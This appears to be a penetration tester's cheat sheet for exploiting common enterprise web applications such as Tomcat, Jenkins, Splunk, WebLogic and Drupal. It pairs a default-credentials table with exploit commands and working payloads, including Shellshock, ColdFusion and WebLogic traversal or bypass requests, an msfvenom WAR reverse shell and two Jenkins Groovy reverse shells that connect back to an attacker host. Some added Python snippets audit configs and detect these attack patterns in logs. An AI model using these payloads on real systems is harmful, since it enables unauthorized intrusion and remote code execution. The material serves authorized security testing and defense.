🛡️ Methodology Checklist
- Web port scan across scope: `nmap -p 80,443,8000,8080,8180,8443,8500,8888,10000 -sV --open`
- Screenshot every web service (EyeWitness / Aquatone) → triage logins, vendor UIs, dashboards/consoles
- Fingerprint each app + version: `whatweb -a3`, 404/error pages, `/about`, `/version`, login-page source
- Test default credentials on every panel before reaching for exploits
- Map version → `searchsploit [APP] [VER]` → NVD → PoC
- Hunt built-in execute/upload features (Jenkins Script Console, Zabbix System.run, Tomcat WAR, Axis2 AAR, osTicket attachments)
- LFI any app to steal config/creds (`tomcat-users.xml`, `settings.php`, `password.properties`)
- Check `.git` on web root; mine wikis (Confluence/DokuWiki) for passwords, keys, configs
🎯 Operational Context
Use when: A specific product, CMS, or appliance is identified (vs. a bespoke custom web app) → exploit its known default credentials, config-file disclosure, and version-specific CVEs.
Think Dumber First: Fingerprint → version → searchsploit → PoC. Always try default creds (admin/admin, admin/changeme, vendor defaults) before exploits; vendor docs list them. Look for legitimate "upload" or "run command" features before hunting memory-corruption bugs.
Skip when: Target is a custom web app with no identifiable product → use Master_Web_Commands (vulnerability-class attacks: SQLi, XSS, LFI, upload, etc.) instead.
⚡ Tactical Cheatsheet
Default Credentials & Panels
| Application | Port(s) | Path / Panel | Default Creds | Primary Attack / CVE |
|---|---|---|---|---|
| WordPress | 80/443 | /wp-login.php | admin/admin, admin/password | Plugin/theme RCE; XML-RPC brute |
| Joomla | 80/443 | /administrator/ | admin/admin | Template shell; CVE-2019-10945 traversal |
| Drupal | 80/443 | /user/login | admin/admin | Drupalgeddon2 (CVE-2018-7600); PHP-filter RCE |
| Tomcat | 8080/8180/8443, AJP 8009 | /manager/html | tomcat/tomcat, admin/admin, tomcat/s3cret | WAR deploy RCE; Ghostcat (CVE-2020-1938) |
| Jenkins | 8080/8000, agent 5000 | /script | admin/admin, admin/[INSTANCE_ID] | Groovy Script Console RCE |
| Splunk | 8000 (UI), 8089 (REST) | / | admin/changeme, root/5iveL!fe | Malicious app (.spl) upload → RCE |
| PRTG | 80/443/8080 | /index.htm | prtgadmin/prtgadmin, PrtgAdm1n | CVE-2018-9276 authenticated cmd injection |
| ColdFusion | 8500 | /CFIDE/administrator/ | none (hash leak via traversal) | CVE-2010-2861 traversal; CVE-2009-2265 (FCKeditor) RCE |
| GitLab | 80/443 | /explore, /users/sign_up | none | CVE-2021-22205 ExifTool RCE (CE < 13.10.2) |
| osTicket | 80/443 | /scp/ | none | Attachment → RCE; CVE-2020-24881 |
| Axis2 | 8080 | /axis2/axis2-admin/ | admin/axis2 | .aar service upload → RCE |
| WebSphere | n/a | /WebSphere/console/ | system/manager | Admin console → WAR deploy |
| Zabbix | 80/443 | /zabbix/ | Admin/zabbix | API / System.run → RCE |
| Nagios | 80/443 | /nagios/ | nagiosadmin/PASSW0RD | Version-specific RCE / plugin abuse |
| WebLogic | 7001 | /console | weblogic/welcome1 | Java deserialization (CVE-2020-14882/14883) |
| vCenter | 443, 5480 (VAMI) | /ui, :5480 | administrator@vsphere.local | OVA upload, SSRF, RCE (CVE-2021-21985/22005) |
Discovery & Fingerprinting
| Command | Tactical Outcome |
|---|---|
| `printf "%s\t%s\n" "[IP]" "app.[DOMAIN] dev.[DOMAIN] blog.[DOMAIN]" \| sudo tee -a /etc/hosts` | Add vhosts to local resolver before scanning |
| `sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA scans/web-ports -iL scope.txt` | Web port discovery across scope (feeds EyeWitness) |
| `eyewitness --web -x scans/web-ports.xml -d eyewitness_output` | Visual screenshot report from Nmap XML |
| `cat scans/web-ports.xml \| aquatone -nmap -out aquatone_output` | Alternative screenshotter with visual clustering |
| `whatweb -a3 [URL]` | Aggressive app fingerprinting for niche CMS/frameworks |
| `ffuf -w [WORDLIST] -u [URL]/FUZZ -mc 200,401` | Find hidden admin portals and config files |
| `searchsploit [APP_NAME] [VERSION]` | Find CVEs for the identified application version |
CMS: WordPress / Joomla / Drupal
| Command | Tactical Outcome |
|---|---|
| `curl -s http://[TARGET_IP]/ \| grep -E 'themes\|plugins'` | WP: discover active themes/plugins from page source |
| `wpscan --url http://[TARGET_IP] --enumerate --api-token [TOKEN]` | Full WP enumeration (plugins, themes, users, vulns) |
| `wpscan --url http://[TARGET_IP] --password-attack xmlrpc -t 20 -U [USER] -P rockyou.txt` | WP brute via XML-RPC (bypasses login lockout) |
| `curl -s http://[TARGET_IP]/administrator/manifests/files/joomla.xml \| xmllint --format -` | Joomla version (gold standard) |
| `droopescan scan drupal -u http://[TARGET_IP]` | Drupal automated enumeration |
| `python3 drupalgeddon2.py http://[TARGET_IP]/` | Drupalgeddon2 (CVE-2018-7600) pre-auth RCE |
App Servers: Tomcat / Jenkins
| Command | Tactical Outcome |
|---|---|
| `nmap -sV -p 8009,8080,8180,8443 [TARGET_IP]` | Tomcat ports (AJP 8009, HTTP 8080/8180, HTTPS 8443) |
| `curl -s http://[TARGET_IP]:[PORT]/[LFI]?file=/usr/local/tomcat/conf/tomcat-users.xml` | LFI to steal Tomcat credentials (plaintext) |
| `msfvenom -p java/jsp_shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f war > shell.war` | Generate malicious WAR for Manager deploy |
| `python2.7 tomcat-ajp.lfi.py [TARGET_IP] -p 8009 -f WEB-INF/web.xml` | Ghostcat (CVE-2020-1938) LFI via AJP 8009 |
| `curl -i http://jenkins.[DOMAIN]:[PORT]/script` | Access Jenkins Script Console (check if unauth) |
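The LFI row above treats tomcat-users.xml as a plaintext credential store. As an added defender-side check (example code, not part of the original cheat sheet), the script below audits a tomcat-users.xml for the default pairs from the credentials table, plaintext passwords, and accounts holding Manager roles; the sample file is constructed and the digest-format regex is a heuristic assumption.

```python
# Added example (not from the original cheat sheet): audit a tomcat-users.xml for
# what the LFI row above goes after. Flags the default pairs from the credentials
# table, plaintext passwords, and accounts holding Manager roles.
import re
import xml.etree.ElementTree as ET

# Default pairs taken from this page's Tomcat row.
DEFAULT_PAIRS = {("tomcat", "tomcat"), ("admin", "admin"), ("tomcat", "s3cret")}
# Roles that unlock the Manager / Host Manager apps (what a WAR deploy needs).
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                 "admin-gui", "admin-script"}
# Heuristic (assumption): a digested password is hex, optionally in Tomcat's
# "<salt>$<iterations>$<hash>" form; anything else is treated as plaintext.
DIGEST_RE = re.compile(r"^[0-9a-fA-F]{16,128}(\$\d+\$[0-9a-fA-F]{32,128})?$")

# Constructed sample in the stock Tomcat layout (not taken from a real host).
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="5d41402abc4b2a76b9719d911017c592" roles="manager-script"/>
  <user username="viewer" password="Str0ng-P@ss" roles="probeuser"/>
</tomcat-users>"""

def audit_tomcat_users(xml_text):
    """Return (username, issue) findings for the body of a tomcat-users.xml."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        # Tomcat 8+ files use a default namespace, older ones none; strip it.
        if el.tag.split("}")[-1] != "user":
            continue
        name, pwd = el.get("username", ""), el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if (name, pwd) in DEFAULT_PAIRS:
            findings.append((name, "default credential pair unchanged"))
        if pwd and not DIGEST_RE.match(pwd):
            findings.append((name, "plaintext password (configure a digest CredentialHandler)"))
        held = roles & MANAGER_ROLES
        if held:
            findings.append((name, "manager role: " + ",".join(sorted(held))))
    return findings

if __name__ == "__main__":
    for user, issue in audit_tomcat_users(SAMPLE_XML):
        print(f"{user}: {issue}")
```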
Jenkins Groovy reverse shell, Linux (paste into Script Console):
```groovy
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/[LHOST]/[LPORT];cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
Jenkins Groovy reverse shell, Windows (controller on Windows; /dev/tcp won't work):
```groovy
String host="[LHOST]";
int port=[LPORT];
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();
```
Monitoring & CGI: Splunk / PRTG / Shellshock
| Command | Tactical Outcome |
|---|---|
| `nmap -sV -p 8000,8089 [TARGET_IP]` | Splunk ports: 8000 (Web UI), 8089 (REST API) |
| `curl -k https://[TARGET_IP]:8089/services/server/info` | Unauthenticated Splunk version via REST API |
| `curl -s http://[TARGET_IP]:[PORT]/index.htm -A "Mozilla/5.0" \| grep version` | PRTG version check |
| `gobuster dir -u http://[TARGET_IP]/cgi-bin/ -w small.txt -x cgi,sh` | Find CGI scripts for Shellshock |
| `curl -H "User-Agent: () { :; }; echo; echo; /bin/cat /etc/passwd" http://[TARGET_IP]/cgi-bin/[SCRIPT].cgi` | Shellshock (CVE-2014-6271) info leak |
Notable Enterprise Apps: ColdFusion / Axis2 / WebLogic / vCenter
| Command | Tactical Outcome |
|---|---|
| `nmap -p- -sV -sC -Pn [TARGET_IP] --open` | Full scan → ColdFusion default port 8500 is not in top 1000 |
| `curl -s http://[TARGET_IP]:8500/CFIDE/administrator/settings/mappings.cfm?locale=../../../../../../../../etc/passwd` | ColdFusion CVE-2010-2861 traversal PoC |
| `curl -s http://[TARGET_IP]/axis2/axis2-admin/` | Axis2 admin panel check (default admin:axis2) |
| `curl "http://[TARGET_IP]:7001/console/css/%252E%252E%252F%252E%252E%252Fconsole.portal"` | WebLogic CVE-2020-14882 auth bypass |
| `curl -sk https://[TARGET_IP]/sdk \| grep -i version` | vCenter version identification |
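As an added example (not part of the original cheat sheet), the detector below runs over constructed access-log lines and flags the request shapes the Shellshock and enterprise-app tables above rely on: the Shellshock User-Agent, traversal in the ColdFusion mappings.cfm locale parameter, the double-encoded WebLogic console path, and direct hits on the Jenkins Script Console and Tomcat Manager. The log lines, hosts and rule names are constructed.

```python
# Added example (not from the original cheat sheet): detection logic for the
# request patterns in the two tables above, run over constructed access-log lines.
import re
from urllib.parse import unquote

# Constructed sample in combined log format (no real hosts or timestamps).
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:10:01:02 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo; echo; /bin/cat /etc/passwd"
203.0.113.5 - - [10/May/2024:10:01:09 +0000] "GET /CFIDE/administrator/settings/mappings.cfm?locale=../../../../../../../../etc/passwd HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2024:10:02:15 +0000] "GET /console/css/%252E%252E%252F%252E%252E%252Fconsole.portal HTTP/1.1" 200 9870 "-" "curl/7.81.0"
198.51.100.9 - - [10/May/2024:10:03:44 +0000] "POST /script HTTP/1.1" 200 120 "-" "Mozilla/5.0"
198.51.100.9 - - [10/May/2024:10:03:50 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/5.0"
192.0.2.20 - - [10/May/2024:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Each rule is (name, predicate over (decoded_path, user_agent)).
RULES = [
    ("shellshock-ua", lambda p, ua: "() {" in ua),
    ("path-traversal", lambda p, ua: "../" in p),
    ("weblogic-console-bypass", lambda p, ua: "console.portal" in p and "../" in p),
    ("jenkins-script-console", lambda p, ua: p.split("?")[0] == "/script"),
    ("tomcat-manager", lambda p, ua: p.startswith("/manager/")),
]

def decode_path(path):
    """URL-decode until stable (bounded) so %252E-style double encoding is seen as '.'."""
    for _ in range(3):
        nxt = unquote(path)
        if nxt == path:
            break
        path = nxt
    return path

def detect(log_text):
    """Return a list of (client_ip, rule_name, raw_path) hits, one per matching rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        decoded = decode_path(m["path"])
        for name, test in RULES:
            if test(decoded, m["ua"]):
                hits.append((m["ip"], name, m["path"]))
    return hits
```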
🔬 Deep Dive & Workflow
Application Discovery Workflow
```bash
# Step 1: Compile scope (IPs, FQDNs, vhosts)
cat scope.txt
# Step 2: Web port scan (common ports only; don't waste time on all 65k)
sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA scans/web-initial -iL scope.txt
# Step 3: Visual recon → triage
eyewitness --web -x scans/web-initial.xml -d eyewitness_out
#   - 401 Unauthorized + "Default Page" = weak-cred opportunity
#   - Titles "Dashboard"/"Admin"/"Console" = high value
#   - Java stack indicators (Tomcat header, WEB-INF dirs)
# Step 4: Deep scan the interesting targets
sudo nmap -sC -sV -p- -oA scans/deepdive [TARGET_IP]
```
Golden Chain for Unknown / Niche Apps
1. Fingerprint → version → searchsploit
2. Check default credentials (admin:admin, admin:password, [app]:password, vendor defaults)
3. Look for file-upload functionality (even "legitimate" ones)
4. Look for built-in "execute command" features (Zabbix System.run, Jenkins Script Console)
5. Check for .git directories on the web root
Scanner blind spots:
- Nessus "no criticals" → check Informational for Nexus, vCenter, JBoss
- Manual browsing reveals "support desk", "wiki", "monitoring" portals
- osTicket "Attached Files" → RCE (never assume small apps are safe)
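For Steps 2 and 3 of the discovery workflow above, this added example (not part of the original cheat sheet) parses the nmap -oA XML into the URL list that gets triaged and flags products that appear in the default-credentials table, so an asset owner can see which panels need their defaults verified. The XML fragment, hostnames and product keyword list are constructed.

```python
# Added example (not from the original cheat sheet): build the web-service
# inventory from nmap XML (Step 2) and mark products whose default credentials
# are listed in the table on this page, so those panels get checked first.
import xml.etree.ElementTree as ET

# Constructed keyword list drawn from the default-credentials table above;
# matched case-insensitively against nmap's product/extrainfo strings.
DEFAULT_CRED_PRODUCTS = ("tomcat", "jenkins", "splunk", "prtg", "zabbix", "nagios",
                         "weblogic", "websphere", "axis2", "coldfusion", "wordpress",
                         "joomla", "drupal")
TLS_PORTS = {443, 8443}  # assume TLS here even if nmap did not label the service

# Constructed nmap XML fragment (not a real scan) with just the elements parsed below.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun>
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
    <hostnames><hostname name="app.example.test" type="user"/></hostnames>
    <ports>
      <port protocol="tcp" portid="8080"><state state="open"/><service name="http" product="Apache Tomcat" version="9.0.30"/></port>
      <port protocol="tcp" portid="8443"><state state="open"/><service name="https" product="Apache Tomcat" tunnel="ssl"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
    </ports>
  </host>
  <host><status state="up"/><address addr="10.0.0.6" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="8000"><state state="open"/><service name="http" product="Jetty" extrainfo="Jenkins"/></port></ports>
  </host>
</nmaprun>"""

def web_inventory(xml_text):
    """Return [(url, product, version, flagged)] for every open HTTP-like port."""
    out = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        hn = host.find("hostnames/hostname")
        name = hn.get("name") if hn is not None else addr  # prefer the vhost name
        for port in host.iter("port"):
            svc = port.find("service")
            if port.find("state").get("state") != "open" or svc is None:
                continue
            svc_name = svc.get("name", "")
            if "http" not in svc_name:
                continue
            portid = int(port.get("portid"))
            tls = svc_name == "https" or svc.get("tunnel") == "ssl" or portid in TLS_PORTS
            url = f"{'https' if tls else 'http'}://{name}:{portid}/"
            product = " ".join(filter(None, (svc.get("product"), svc.get("extrainfo")))) or "unknown"
            flagged = any(k in product.lower() for k in DEFAULT_CRED_PRODUCTS)
            out.append((url, product, svc.get("version", ""), flagged))
    return out
```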
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Application version not visible | No version in headers/response | Check 404 error page, login-page source, and /about or /version endpoints |
| Default creds list incomplete | Generic list | Search [APP_NAME] default credentials on vendor documentation pages |
| searchsploit version match too strict | Exact version required | Search broader: `searchsploit [APP_NAME]`, then filter by version range manually |
| Known exploit requires specific config | PoC assumptions wrong | Read PoC source; identify prerequisites (auth required, module enabled, etc.) |
| App fingerprinted incorrectly | Wappalyzer/whatweb misidentification | Confirm manually: HTTP headers, HTML source, cookie names, error messages |
| ColdFusion not found in scan | Default port 8500 outside top 1000 | Run -p- full scan on interesting hosts |
📝 Reporting Trigger
Finding Title: Common Enterprise Application Vulnerable to Known Exploit / Default Credentials
Impact: Identified enterprise application matches a known public exploit or ships with unchanged default credentials, enabling rapid exploitation without vulnerability research, reducing attacker time-to-compromise to minutes using freely available tools, often with direct RCE on the application server.
Root Cause: Common enterprise application not updated to address publicly disclosed vulnerabilities; default credentials not changed during deployment; no asset management or vulnerability scanning tracking common application versions.
Recommendation: Change all default credentials on deployment. Implement vulnerability scanning that covers common enterprise applications. Establish patch SLAs for critical CVEs. Restrict admin interfaces to a management network and enforce MFA. Remove or isolate vulnerable applications that cannot be immediately patched.